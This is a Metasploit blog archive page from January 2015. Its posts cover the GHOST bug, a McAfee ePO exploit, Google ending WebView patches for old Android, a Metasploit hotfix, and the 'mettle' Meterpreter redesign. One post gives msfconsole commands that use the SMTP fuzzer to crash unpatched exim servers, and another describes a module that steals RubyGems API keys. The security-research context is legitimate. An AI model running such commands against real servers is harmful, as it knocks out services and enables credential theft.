Skip navigation
All Places > Metasploit > Blog > 2015 > January

No, I Will Not Make A Ghost Pun


This week was marked -- some might say mauled -- by the news of another cutely-named vulnerability, GHOST. I'm sure it's a huge deal and justified all of the ballyhoo surrounding it, so I won't get into all that. If you're looking for some technical background, please see Michal Zalewski's excellent analysis.


Since we're in the exploit business, you can be sure I've spent a lot of time fielding questions about severity, ubiquity, and Metasploit coverage this week. We determined pretty early that Metasploit wasn't affected, like most software analyzed so far. So, that's one bullet dodged.


We also confirmed that Metasploit had no need to add an exploit for the publicly-disclosed exim denial of service (DoS), since we've had one shipping with for a little over four and a half years. The venerable SMTP fuzzer module will trip the condition, with just a little bit of tweaking, like so:


msf> use auxiliary/fuzzer/smtp/smtp_fuzzer
msf> set STARTLEN 1239
msf> set CMD HELO
msf> set FuzzChar 0
msf> set RHOST
msf> run


With that, you're off to hunt down and knock over all the unpatched, specially-configured, and somewhat old exim servers in your environment. They probably weren't doing anything important anyway. (Okay, only try this on a test network when you're trying to determine if your IDS/IPS is working, or if you have a mature Chaos Monkey style production environment).


As this is a library-level vulnerability, GHOST is not limited to merely old and weird versions of EXIM. I'm sure that we'll have a handful of software and embedded systems that will turn out to be vulnerable to this. In fact, as of this morning, community contributor Christian FireFart Mehlmauer put up a pull request for a Wordpress GHOST scanner, which is nice to have. That'll be landed to Framework this morning, I expect, after the usual code review.


That leaves the remote code execution angle. Of course, that's the only angle anyone really cares about, and it's the hardest nut to crack here. I believe Qualys's conclusion that this bug can lead to RCE... under certain, somewhat specialized circumstances. We kicked it around for a day or two here at Rapid7 and in the Metasploit Freenode channel. Turns out, popping shells with this bug is easier said than done. Maybe if we spent an extra 88 days on it, we'll be able to replicate the conditions required to get code execution. That said, the interest in the open source security community seems pretty low.


I welcome any comers, of course. On the bright side, Qualys says they'll be releasing the Metasploit module "in the near future." I'm looking forward to seeing how they did it, given all the constraints, so I'm looking forward to their submission.


New Modules

We have two new modules since the last Weekly Wrapup was published. I've been waiting for a credential file stealer for literally years, and this week, Jonathan Claudius delivered. It's a post module that snarfs up your saved API key, used to publish gems, which is stored, in the clear, in a known location.


Unfortunately, the first version of this module used YAML.load to parse out the credential itself, which can be a Bad Thing. How ironic would that be? You pop a machine of a known Ruby developer (like, say, a Metasploit contributor), go for the RubyGems credential, and end up getting popped right back as soon as you parse your ill-gotten gains! The module was only live for about 13 hours with this security exposure, never shipped in Metasloit Pro or Community Editions or the Kali builds, and was caught the morning after by James egypt Lee. To me, this is a success story for open source code review -- our community and contributor base is highly engaged and puts a critical security eye on pretty much anything we write. It also points out that common programming practices, like using YAML.load to load YAML files (duh?) can lend themselves to exposing security bugs, just by using the normal, standard APIs.

It's kind of a shame we didn't ship the exposure, since it'd be a fun, if dastardly, trick to pull at the Capture-The-Flag event at InfoSec Southwest this April here in Austin. (:


Auxiliary and post modules


Weekly Metasploit Wrapup

Posted by todb Employee Jan 23, 2015

McAfee ePO Vulnerability Disclosure

This week, we have another delightful exploit from our dear friend Brandon Perry, which targets McAfee's ePolicy Orchestrator. This bug was disclosed on the Full Disclosure mailing list on January 8, hit the Metasploit pull request queue on January 14, and was committed to the master branch of Metasploit Framework on January 18th, whereupon it got picked up by the Rapid7 Vulnerability and Exploit Database.


Knocking over security software is a special kind of win for any vulnerability researcher like Brandon, or us here at Rapid7, or really anyone. Why? Writing software of any complexity is hard. Writing software for a profit is also hard. Writing software that handles unknown user data is especially hard to pull off without introducing security vulnerabilities. Writing software that intentionally handles malicious and attacker-sourced data is insanely hard.


The fact that McAfee (or Rapid7, or Symantec, or anyone) is able to produce and sell enterprise-level security software at all is kind of a miracle, and I don't mean that negatively at all. People have been attacking McAfee branded software for twenty years, and yet they only have 163 CVEs against their entire suite of past and current software. This is pretty amazing, and at the same time, a testament to Brandon and his ability to pick out a new (to the public) exploit path from a software company that's been training against the best security engineers in the world for so long. In addition, they reacted to Brandon's initial disclosure appropriately with a quick turnaround on updating their knowledge base article on workaround solution. So, a win all around, if you ask me.


Just to be clear, we stick to a pretty reasonable disclosure policy here at Rapid7 -- we give vendors and CERT/CC tens of days of heads up before public disclosure. Of course, if there's already an exploit out in the world, it's not like we're going to hold it back; defenders, penetration testers, and researchers are best served by having reliable exploits at their disposal in order to ensure their customers, constituencies, and the Internet at large a safer place. The existence of publicly disclosed and discussed vulnerabilities are pretty crucial for the continued health of the Internet.


So, thanks Brandon, and McAfee, for providing a great example of things working out the right way.


Deprecations, Deprecations Everywhere

Just as a reminder, we're on track for a pile of deprecations in and around Metasploit in 2015. The most significant would be dropping support for Ruby 1.9.x, in favor of 2.1.x , starting the first week of February. Ruby 1.9.x itself goes end of life near the end of February, so if you haven't cut over yet, you might want to prioritize that to shake out any forward compatibility issues.


The command line utilities msfcli, msfpayload, and msfencode will also be dropped out in June, so if you rely on those for any automated processes, you're going to want to get more familiar with their replacements, msfconsole -X (or -r), and msfvenom.


New Modules

Since we last published, Metasploit has picked up four new exploits and five new auxiliary and post modules, including the above-discussed McAfee ePO XXE exploit.


The Arris command exec module by HeadlessZeke is pretty worrisome from a SOHO router perspective -- these Arris chipsets are all over the place under a lot of different brand names, and they are a) never patched and b) often ship with backdoors and c) are pretty soft targets for bug hunters. If you're a penetration tester and somehow managed to get some SOHO routers in scope on a real assessment, please tell me how you did it!


Exploit modules


Auxiliary and post modules

Hi folks! Sorry about the delay on this week's blog post. I've been responding to a few concerns about this week's Android revelations about the no-patch policy from Google with regard to nearly a billion in-use Android handsets, and incidentally, caught a face cold that's been floating around Rapid7's delightful open-space office model. I'm back online and fully functional, now, so I'll try to summarize here what I saw and responded to this week.


Pre-Jelly Bean Android WebView Patches


android-packaging-small.jpg by used under CC-BYIf you somehow missed it, I published a blog post earlier this week about how Google now is telling vulnerability researchers (at least, a couple that I know) that they will no longer be providing patches for pre-Jelly Bean Android. This ended up getting some pickup from such esteemed media outlets as the Wall Street Journal, Forbes, and Taylor Swift, which generated a few thousand comments spread all over the Internet. I'll take a stab at summarizing the critical reaction here, and I promise I'm being sincere when characterizing these sentiments fairly. If I screw it up, please tell me.


OEMs don't patch anyway, so who cares?

It's true that the security patching for Android is, at best, quite broken. I wrote a post back in November about this issue, and this rejoinder is totally valid.


My problem, though, is that we're talking about two different things. One, Google is (now) not interested in working up patches for Android for issues before KitKit (4.4), and two, downstream vendors are very slow on picking up patches from Google (if ever). They're related, to be sure. However, I don't think you can solve the latter problem without solving the former, and there are two problems here for sure.


With the second problem, you can easily argue that downstream OEMs, carriers, and retailers are dropping the ball by not applying patches for old, publicly reported vulnerabilities. However, if you consider that Google isn't producing patches any more for shipping and for-sale devices, I feel like there's no longer even a ball to drop for those OEMs. Moreso, I feel like this change in attitude from Google makes it very easy for vendors to shrug and disclaim any responsibility for old vulns on their devices. You can argue this legally, ethically, technically or otherwise and there's room for disagreement, but Google walking away from patches, in my mind makes this state of affairs much worse.


Now, with all that said: Today, we can test this! We have two Metasploit modules shipping today that breaks the security model for pre-4.4 WebView: one is fixed upstream, and one remains unfixed. I'm /very/ interested in figuring out which, if either, of these vulnerabilities sees a downstream patch on pre-4.4 handsets. It's a pretty ideal test case, since they were discovered and reported so close to each other.


If you keep tabs on downstream devices and patch adoption versus patch creation, I would love to hear from you. Let's work together to see what the practical effects of this policy shift is.


Jelly Bean is legacy, so who cares?

While it's true that Jelly Bean is two named revisions back, and KitKat adoption is ticking up nicely, it's not like everyone gets to automatically upgrade for free. There are hardware costs, time and convenience costs, the carriers often limit choices or penalize customers for upgrading, people don't know how to upgrade, etc. There's a whole host of reasons, some good, some not, to stick to Jelly Bean.


Let's remember that Ice Cream, Gingerbread, and Froyo together account for nearly 15% of tracked Android devices, and these guys are three, four, and five versions back! Heck, if I had an exploit that worked reliably on these phones, and I was the sort to go popping randoms who visit my evil website and snagging personal usernames and passwords, I'd be pretty thrilled to know that 15% of my target base is guaranteed vulnerable. After all, Windows XP accounts for about 18% of the total desktop market share today, and I know for a fact that there's an active criminal and government (and criminal government) marketplace for security bypasses on XP. 15% is good enough for plenty of shady applications.


Now, consider that when you add in Jelly Bean, you're talking about nearly half (46%) of all Android phones just by itself. Add to that the way-downrev versions, you come to way over half of all Android phones. So, where 15% is good for bad guys, 60% is way more than four times better. The value for bad guys is exponentially related to the install base.


Consider, too, that WinXP went end-of-life for security patches 12 years after initial release. Google's apparent attitude shift about patching WebView became apparent only 2 years (technically, 28 months) after Jelly Bean's release.


WebView isn't part of the Android OS anymore, so who cares?

Yes, Google took a great leap forward by decoupling WebView from Android as of the Lollipop (5.0) release. I'm thrilled for this, and in five years, I expect the majority of in-use phones will be Lollipop or later.


In five years, we'll also be shaking our heads in bewilderment over all those people stuck on KitKat at below, thanks to the above-mentioned broken patch distribution model for handsets. Or not? I hope not. That's just too depressing to consider. Let's move on.


It's just WebView, not Jelly Bean, so who cares?

If I'm an attacker, and I had to choose one component of Android to focus my exploit efforts on, it'd be WebView, hands down. WebView is the one component that's used in virtually every ad-enabling library to remind me that I still don't care about Clash of Clans, and is used when you don't click "open link in browser" in every web-rendering app.


It's even used in the About Phone license page (which itself can lead to exploitation, thanks to some crafty keystrokes from friend-of-the-show Jgor).


The fact that Google will patch AudioPlayer, but not WebView, in a pre-4.3 context is frankly baffling. Why they would choose to abandon the best exploit vector an attacker has makes absolutely no sense to me.


I use Chrome, not AOSP Browser, so who cares?

Chrome (and other browsers, like Firefox and Dolphin), do not use the WebView component, so switching to these browsers for your day-to-day is a great mitigation step. If you're using the bundled AOSP browser on Jelly Bean or prior, stop it. If you're using your carrier's skinned browser, it's almost certainly using WebView as well, so stop that, too.


That said, though, the underlying WebView component is still exposed via apps and ad networks. TrendMicro took a look at a bunch of aftermarket browsing, messaging, and other apps, and found that a bunch are still vulnerable.


And that's it..?

I really do hope that I've captured the criticism here accurately, in an (unironic) fair and balanced way. If I've misstated your favorite argument, or if you have another that I haven't captured here, please comment below, or pick a fight with me on twitter.


New Modules

While I'll happily talk all day about Android security, this wrapup is intended to cover the changes in Metasploit over the last three weeks and change, and we celebrated HaXmas in there, it's a little outsized. We have 11 new exploits, and 8 new auxiliary modules this week, for a total of 19 new usable modules to kick off 2015. Among those are, suprise, a new Cookie Theft module from Joe Vennix and Rafay Baloch that affects, double surprise, Android Jelly Bean. Will it be patched, ever?



Exploit modules


Auxiliary and post modules

Over the past year, independent researcher Rafay Baloch (of "Rafay's Hacking Articles") and Rapid7's Joe Vennix have been knocking out Android WebView exploits somewhat routinely, based both on published research and original findings. Today, Metasploit ships with 11 such exploits, thanks to Rafay, Joe, and the rest of the open source security community. Generally speaking, these exploits affect "only" Android 4.3 and prior -- either native Android 4.3, or apps built with 4.3 WebView compatibility. sadjellybeans_t.png


WebView is the core component used to render web pages on an Android device. It was replaced in Android KitKat (4.4) with a more recent Chromium-based version of WebView, used by the popular Chrome browser.


Despite this change, though, it’s likely there will be no slow-down of these Android security bugs, and they will probably last a long time due to a new and under-reported policy from Google's Android security team: Google will no longer be providing security patches for vulnerabilities reported to affect only versions of Android's native WebView prior to 4.4. In other words, Google is now only supporting the current named version of Android (Lollipop, or 5.0) and the prior named version (KitKat, or 4.4). Jelly Bean (versions 4.0 through 4.3) and earlier will no longer see security patches for WebView from Google, according to incident handlers at


Up until recently, when there's a newly discovered vulnerability with Android 4.3, the folks at Google were pretty quick with a fix. After all, most people were on the "Jelly Bean" version of Android until December of 2013. Jelly Bean's final release was just over a year ago in October of 2013. This is why this universal cross-site scripting bug was fixed, as seen in the Android changelog and Rafay's blog, Rafay Hacking Articles.


Google on Patching pre-KitKat

However, after receiving a report of a new vulnerability in pre-4.4 WebView, the incident handlers at responded with this:


If the affected version [of WebView] is before 4.4, we generally do not develop the patches ourselves, but welcome patches with the report for consideration. Other than notifying OEMs, we will not be able to take action on any report that is affecting versions before 4.4 that are not accompanied with a patch.


So, Google is no longer going to be providing patches for 4.3. This is some eyebrow-raising news.


I've never seen a vulnerability response program that was gated on the reporter providing his own patch, yet that seems to be Google's position. This change in security policy seemed so bizarre, in fact, that I couldn't believe that it was actually official Google policy. So, I followed up and asked for confirmation on what was told to the vulnerability reporter. In response, I got a nearly identical statement from


If the affected version [of WebView] is before 4.4, we generally do not develop the patches ourselves but do notify partners of the issue[...] If patches are provided with the report or put into AOSP we are happy to provide them to partners as well.


When asked for further clarification, the Android security team did confirm that other pre-KitKat components, such as the multi-media players, will continue to receive back-ported patches.


Sorry, Jelly Bean, You're Too Old

Google's reasoning for this policy shift is that they "no longer certify 3rd party devices that include the Android Browser," and "the best way to ensure that Android devices are secure is to update them to the latest version of Android." To put it another way, Google's position is that Jelly Bean devices are too old to support -- after all, they are two versions back from the current release, Lollipop.


On its face, this seems like a reasonable decision. Maintaining support for a software product that is two versions behind would be fairly unusual in both the proprietary and open source software worlds; heck, many vendors drop support once the next version is released, and many others don't have a clear End-Of-Life (EOL) policy at all. (An interesting side note: neither Google nor Apple have a published EOL policy for Android or iOS, but Microsoft and BlackBerry provide clear end of life and end of sales dates for their products).


Most Android Devices Are Vulnerable

While this may be a normal industry standard, what's the situation on the ground? Turns out, the idea that "pre-KitKat" represents a legacy minority of devices is easily shown false by looking at Google's own monthly statistics of version distribution:



As of January 5, 2015, the current release, Lollipop, is less than 0.1% of the installed market, according to Google's Android Developer Dashboard. It's not even on the board yet.


The next most recent release, KitKat, represents about two fifths of the Android ecosystem. This leaves the remaining 60% or so as "legacy" and out of support for security patches from Google. In terms of solid numbers, it would appear that over 930 million Android phones are now out of official Google security patch support, given the published Gartner and WSJ numbers on smartphone distribution).


The Economics of Upgrading

Beside the installed bases, I posit that the people who are currently exposed to pre-KitKat, pre-Chromium WebView vulnerabilities are exactly those users who are most likely to not be able to "update to the latest version of Android" to get security patches. The latest Google Nexus retails for about USD$660, while the first hit for an "Android Phone" on Amazon retails for under $70. This is a nearly ten-fold price difference, which implies two very different user bases; one market that doesn't mind dropping a few hundred dollars on a phone, and one which will not or cannot spend much more than $100.


Taken together -- the two-thirds majority install base of now-unsupported devices and the practical inability of that base to upgrade by replacing hardware -- means that any new bug discovered in "legacy" Android is going to last as a mass-market exploit vector for a long, long time.


Here Come the Mass-Market Exploits

This is great news for penetration testers, of course; picking company data off of Android phones is going to be drop-dead easy in many, many cases, and I fully expect that handsets will be increasingly in-scope for penetration testing engagements. Unfortunately, this is great news for criminals for the simple reason that, for real bad guys, pretty much everything is in scope.


Open source security researchers routinely publish vulnerability details and working exploits with the expectation that this kind of public discussion and disclosure can get both vendors and users to take notice of techniques employed by bad guys. By "burning" these vulnerabilities, users come to expect that vendors will step up and provide reasonable defenses. Unfortunately, when the upstream vendor is unwilling to patch, even in the face of public disclosure, regular users remain permanently vulnerable.


Roll Your Own Patches?

It's important to stress that Android is, in fact, open source. Therefore, it's not impossible for downstream handset manufacturers, service providers, retailers, or even enthusiastic users to come up with their own patches. This does seem to happen today; a 4.3 vulnerability may affect, say, a Kyocera handset, but not a Samsung device with the "same" operating system.


While this is one of the core promises of open source in general, and Android in particular, it's impossible to say how often this downstream patching actually happens, how often it will happen, and how effective these non-Google-sourced patches will be against future "old" vulnerabilities.


The update chain for Android already requires the handset manufacturers and service carriers to sign off on updates that are originated from Google, and I cannot imagine this process will be improved once Google itself has opted out of the patching business. After all, is AT&T or Motorola really more likely to incorporate a patch that comes from some guy on the Internet?


No Patches == No Acknowledgement

To complicate matters, Google generally does not publish or provide public comment on Android vulnerabilities, even when reported under reasonable disclosure procedures. Instead, Android developers and consumers rely on third party notifications to explain vulnerabilities and their impact, and are expected to watch the open source repositories to learn of a fix.


For example, Google's only public acknowledgement of CVE-2014-8609, a recent SYSTEM-level information disclosure vulnerability was a patch commit message on the Lollipop source code repository. Presumably, now that Google has decided not to provide patches for "legacy" Android WebView, they will also not be providing any public acknowledgement of vulnerabilities for pre-KitKat devices at all.


Please Reconsider, Google

Google's engineering teams are often the best around at many things, including Android OS development, so to see them walk away from the security game in this area is greatly concerning.


As a software developer, I know that supporting old versions of my software is a huge hassle. I empathize with their decision to cut legacy software loose. However, a billion people don't rely on old versions of my software to manage and safeguard the most personal details of their lives. In that light, I'm hoping Google reconsiders if (when) the next privacy-busting vulnerability becomes public knowledge.


The Update (2014122301) which was released on December, 23th 2014, failed to include necessary files for the application to update to version 4.11.0 for the first time.



The application will not start, therefore browser will provide generic "The page can’t be displayed" message when trying to load the web UI.

Additionally, various log messages may appear in respective log files.

Windows: C:\metasploit\apps\pro\engine\prosvc.log

Linux: /opt/metasploit/apps/pro/engine/prosvc_stderr.log

/opt/metasploit/apps/pro/ui/lib/metasploit/pro/ui/common_configuration.rb:2:in `<top (required)>': uninitialized constant Metasploit::Pro::UI (NameError)

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/polyglot-0.3.5/lib/polyg lot.rb:65:in `require'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/polyglot-0.3.5/lib/polyg lot.rb:65:in `require'

from /opt/metasploit/apps/pro/ui/lib/metasploit/pro/ui/engine.rb:1:in `<top (required)>'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/polyglot-0.3.5/lib/polyg lot.rb:65:in `require'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/polyglot-0.3.5/lib/polyg lot.rb:65:in `require'

from /opt/metasploit/apps/pro/engine/config/application.rb:22:in `<top (required)>'

from /opt/metasploit/apps/pro/engine/lib/metasploit/pro/engine/command/base.rb:44:in `require'

from /opt/metasploit/apps/pro/engine/lib/metasploit/pro/engine/command/base.rb:44:in `require_environment!'

from /opt/metasploit/apps/pro/engine/lib/metasploit/pro/engine/command/base.rb:65:in `start'

from prosvc.rb:17:in `<main>’

Windows: C:\metasploit\apps\pro\ui\thin.log

Linux: /opt/metasploit/apps/pro/ui/log/thin.log

/opt/metasploit/apps/pro/ui/lib/metasploit/pro/ui/common_configuration.rb:2:in `<top (required)>': uninitialized constant Metasploit::Pro::UI (NameError)

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/polyglot-0.3.5/lib/polyg lot.rb:65:in `require'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/polyglot-0.3.5/lib/polyg lot.rb:65:in `require'

from /opt/metasploit/apps/pro/ui/config/application.rb:23:in `<top (required)>'

from /opt/metasploit/apps/pro/ui/config/environment.rb:2:in `require'

from /opt/metasploit/apps/pro/ui/config/environment.rb:2:in `<top (required)>'

from /opt/metasploit/apps/pro/ui/ `require'

from /opt/metasploit/apps/pro/ui/ `block in <main>'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/rack-1.4.5/lib/rack/buil der.rb:51:in `instance_eval'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/rack-1.4.5/lib/rack/buil der.rb:51:in `initialize'

from /opt/metasploit/apps/pro/ui/ `new'

from /opt/metasploit/apps/pro/ui/ `<main>'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/rack/adap ter/loader.rb:33:in `eval'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/rack/adap ter/loader.rb:33:in `load'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/rack/adap ter/loader.rb:42:in `for'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/thin/cont rollers/controller.rb:169:in `load_adapter'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/thin/cont rollers/controller.rb:73:in `start'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/thin/runn er.rb:187:in `run_command'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/thin/runn er.rb:152:in `run!'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/bin/thin:6:in `<top (required)>'

from /opt/metasploit/apps/pro/ui/scripts/ctl.rb:33:in `load'

from /opt/metasploit/apps/pro/ui/scripts/ctl.rb:33:in `start_thin'

from /opt/metasploit/apps/pro/ui/scripts/ctl.rb:47:in `<main>'

Affected Editions

Metasploit Pro, Express and Community.



The issue is only applicable if the application updated to version 4.11.0 between December, 23rd 2014 and January, 7th 2015. If the application updated to version 4.11.0 before or after these dates, and is currently running 4.11.0, it should not be affected by this issue.



On Linux:

1. Launch a Linux terminal via SSH or console

2. Stop Metasploit:

   /etc/init.d/metasploit stop

3. Change to your Metasploit installation directory, e.g.:

   cd /opt/metasploit

4. Create a hotfix directory:

   mkdir -p apps/pro/install/hotfix

5. Change to the hotfix directory:

   cd apps/pro/install/hotfix

6. Download the hotfix from Rapid7:


7. Extract the hotfix (substitute your installation directory as necessary):

   /opt/metasploit/common/bin/7za x metasploit-4.10.2-hotfix.7z

8. Install the hotfix (substitute your installation directory as necessary):

   /opt/metasploit/ruby/bin/ruby install.rb


On Windows:

1. Stop Metasploit:

   Start Menu -> Metasploit -> Services -> Stop

2. Open a Windows command prompt/shell as an administrator:

   Start Menu -> type cmd.exe -> right click cmd.exe -> click Run as administrator

3. Change to your Metasploit installation directory, e.g.:

   cd C:\metasploit

4. Create a hotfix directory:

   mkdir apps\pro\install\hotfix

5. Change to the hotfix directory:

   cd apps\pro\install\hotfix

6. Download the hotfix via your web browser:

   Save or move the hotfix to C:\metasploit\apps\pro\install\hotfix (substitute your installation directory as necessary)

7. Extract the hotfix (substitute your installation directory as necessary):

   C:\metasploit\ruby\bin\7za.exe x metasploit-4.10.2-hotfix.7z

8. Install the hotfix (substitute your installation directory as necessary):



The hotfix will take a few minutes to run and provide no output.  You may see some warnings that you may safely ignore.


After it completes, Metasploit will be automatically started.  Please wait 5 minutes and then access Metasploit in your browser:


Once logged in, you will need to update Metasploit to the latest version as you normally would.


12 Days of HaXmas: Wrapped!

Posted by todb Employee Jan 7, 2015

Wow, another 12-day blogging sprint in the can! This scheme to keep the Metasploit blog churning over the holidates always sounds like such a good idea in mid-December. By the time January rolls around... well, at least we got a ton of new blog posts for you to read as you ease back into the post-new-year grind of InfoSec. So, to close this thing out and to give you a reasonable place to find the HaXmas posts, please join me in song.


On the 12th day of HaXmas, my true love gave to me...

12 Meterpreter Mettles

11 Linux Migrations

10 Fingerprinting Frameworks

9 Android Exploits

8 Git client RCEs

7 Mildly Interesting Metasploit Stats


5 Blended Ducks

4 Password Bruteforcers

3 Jsobfus

2 Time Capsules

and an MS14-068


Even if the counts are complete fabrications, and the meter stumbles a little in the middle, you still cannot resist hearing the tune in your head. Happy New Year!

This post is the twelfth in a series, 12 Days of HaXmas, where we usually take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014. As this is the last in the series, let's peek forward, to the unknowable future.

Happy new year, it's time to make some resolutions. There is nothing like a fresh new year get ones optimism at its highest.


Meterpreter is a pretty nifty piece of engineering, and full of useful functionality. The various extensions and delivery mechanisms can do amazing things that I am still trying to wrap my head around. But, there are other, more fundamental, parts of Meterpreter's design that are showing their age. The primary problems I have run into are that it's not terribly efficient and still a little unpredictable when stressed, the POSIX meterpreter is pretty tricky to build and leads to a lot of frustration, and testing is a somewhat manual, tribal-knowledge sort of process. Due to the high degree of integration between Meterpreter, its wire protocol (TLV) and Metasploit Framework, it can be difficult to make sure that all of the bells and whistles keep working, either in isolation or together, and difficult to track down the cause of a problem.


Luckily, my job is to make all of these things better this coming year! To this end, I have been spending my first month at Rapid7 experiencing all of the pain and joy of Meterpreter development.  At the same time, I have been hatching plans to make Meterpreter an even more amazing tool. As part of this effort, I started working on an experimental tool that I'm calling 'mettle'. Mettle means to deal with difficulties in a spirited and resilient way. There also happens to be a cool looking Marvel comic book character.  It is currently just something I am working on to scratch my second-system itch, but it tries to solve a few real problems with Meterpreter's design today.


If they can build it, they will come


First up, the POSIX build system for meterpreter has not seen as much love as the Windows version. Its understandable: working on Makefiles is not very sexy work, and there is nothing like a lot of technical debt in a build system to sap one's spirits.  But, they are important! So, the first leg of my project is to put together a build system that can work with multiple architectures, with cross compilation and readability in mind. Rule number one is to require nothing fancy, just GNU make. Everything else can be built or bootstrapped. This is my top-level make file so far:




include scripts/make/Makefile.common
include scripts/make/Makefile.libev
include scripts/make/Makefile.libpcap
include scripts/make/Makefile.libressl
include scripts/make/Makefile.libtlv
include scripts/make/Makefile.kernel-headers
include scripts/make/


There is not a lot to see here - almost everything is in the include files. The point of this is to make the build system easier to understand by not including the kitchen sink in a single big file. This also makes merging changes from pull requests easier, since unrelated changes don't bleed into each other. Want to add a new library? It's one line here, and all of the goo goes somewhere else.  Experimenting with several of the older PRs for meterpreter, all of them conflicted heavily with the big main Makefile, leading to a merge nightmare. Separated-out code is easier to merge and test, and helps prevent bit-rot.


The other thing to note is that there is an addition of a 'tools' and a 'kernel-headers' makefile.  I'm working on building everything with a cross-compiler, notably the ELLCC compiler with the musl C library. ELLCC is an interesting project because it provides a single toolchain that not only targets many different platforms, but itself runs on those same platforms and more. Musl is a C library focused on security and simplicity. It also happens to still support Linux 2.4 kernels, which makes it interesting for 'run everywhere' software like Meterpreter.  By using a cross compiler, builds on my Ubuntu 14.04 system can generate the same binaries as your Fedora 20 system. But, you could also build them on OS X or Windows and get the same results. It also makes it possible to target other architectures and platforms later. I have an outer driver script that looks like this, just to keep things honest:



for i in armeb-linux-engeabi armeb-linux-engeabihf \
        arm-linux-engeabi arm-linux-engeabihf \
        mipsel-linux-eng mipsel-linux-engsf \
        mips-linux-eng mips-linux-engsf \
        ppc-linux-eng \
        i386-linux-eng x86_64-linux-eng; do
        echo Building target $i
        make TARGET=$i;


Each of the builds is isolated into its own build tree, so you can keep them around and switch between them without having to 'make clean' first:


~/projects/mettle$ ls builds/    armeb-linux-engeabi  armeb-linux-engeabihf  i386-linux-eng  kernel-headers-3.12.6

~/projects/mettle$ ls builds/i386-linux-eng/

include  lib  libev  libpcap  libressl share


I'm also keeping the source tarballs for the build in a separate repository to provide both a fast and reliable mirror for upstream sources. This removes dependency on upstream sources that may move, become unavailable, or might even be replaced.

~/projects/mettle/deps$ ls   ellcc-Mac_OS_X_10.9.5-0.1.6.tar.gz  kernel-headers-3.12.6.tar.xz  libpcap-1.6.2.tar.gz   ellcc-x86_64-linux-eng-0.1.6.tgz    libev-4.19.tar.gz  libressl-2.1.3.tar.gz


Separating out the pieces



I'm a big fan of separation of concerns and event-oriented programming. Modular code is simpler and easier to test because you can test each part in isolation. It also makes it easier to change one piece without affecting everything, because the interfaces are isolated and mockable. On that note, the core Meterpreter command dispatcher looks something like this (simplified, but not a lot):


The server_dispatch function runs in a loop, receiving packets from the control socket. A 'packet' in this case is really just a header followed by a command. Each packet is passed to command_handle, which then scans a command table of strings to find a pointers to a function that knows how to parse and operate on this kind of packet. In most cases, a new thread is created by command_handle, which is passed the function pointer and the packet. The packets are then passed to the handler function, which may be built into Meterpreter or dynamically loaded as part of an extension (usually the later). While this design the listening socket from blocking while a command is dispatched, it means that a post module like 'windows/gather/enum_services' translates into hundreds of threads spawned within Meterpreter. The lack of synchronization between these threads can also translate into stability problems, as a command sequence might be sent as 'open handle, close handle', but actually get executed in reverse.


This pass-through design also means that every layer of the stack has to understand the concept of a 'packet', how to parse it and how to generate responses directly back to the command socket. This makes it difficult to re-purpose the command handlers for a different API, like being hooked to a scripting language, or using a different type of wire format to communicate from the Metasploit framework.


next.pngTo this solve these problems, I am integrating an event loop into mettle's design that will separate the command packet parsing from the callbacks, and separates the execution of the command handler itself into a separate thread. This design has several advantages.


First, there only needs to be two threads at minimum - one to handle command ingress and egress, and another to actually execute the commands. More command dispatchers could be added for multiple channels into mettle.


Second, the packet parsing and generation will be separated out from the actual API calls. This will allow using the APIs from other sources, such as a built-in scripting language perhaps, or a different command format than TLV if desired.


Third, it allows commands to be run sequentially and synchronously without blocking the communications channels. Commands could even continue executing in the event of a disconnect from the command channel back to the Metasploit framework, and this design would be able to continue without any issues. It would behave similarly to how command dispatch works within the framework itself, supporting the concepts of queued commands and retries as well.


Designing for testability


Screen Shot 2015-01-03 at 2.03.52 PM.pngI'm tackling this on two fronts. On one hand, Meterpreter has some lovely test cases already in the form of the post/test/ modules. Unfortunately, these probably are not run as frequently as they should be, and are not part of our continuous integration tests. As such, they have had a little bit rot. But, I have been working on cleaning these tests up and fixing issues in Meterpreter that prevent these tests from passing today. I have also been working in Jenkins and vagrant to provision fresh victim VMs on the fly, run rc scripts with the Metasploit. Tests are nice, automated tests are awesome!


Hopefully, it will not take too long to get all of these tests passing reliably with Meterpreter, and I these tests have already found some interesting bugs, such as this.


Because Meterpreter is already largely built as shared library objects, this is actually an ideal setup for unit testing. One 'simply' links a test harness executable to the libraries and away you go. However, there is a problem as hinted at above: the actual API calls parse and return Packets directly, rather than implementing a C calling convention. The more modular design of mettle should help this by giving the standard API calls a real function signature that can be tested directly, so the transport parsing, dispatch and APIs themselves can be tested separately.


This will also allow mocking up the API backend itself, to make concepts like record and playback meterpreter sessions for testing Metasploit post modules possible without a backing VM. If not anything else, 2015 should be the year of tests!


Onward, onward


There is a lot more work to do on mettle, so things may change over time. I envision it possibly replacing or living along-side the POSIX Meterpreter first, since the API breadth is lower there compared to the Windows version. It might simply live along-side Meterpreter in general, since it would be nice to have something that could be used for research and development without as much worry about breaking things in the short term. I'm hope your mind is also racing like mine, thinking of other uses for an event loop and disconnected command queue, like 'sleep' modes, scriptability, covert channels and similar. But for now, I am continuing with the basics of getting it as testable, buildable, efficient and reliable as possible.

This post is the eleventh in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014.

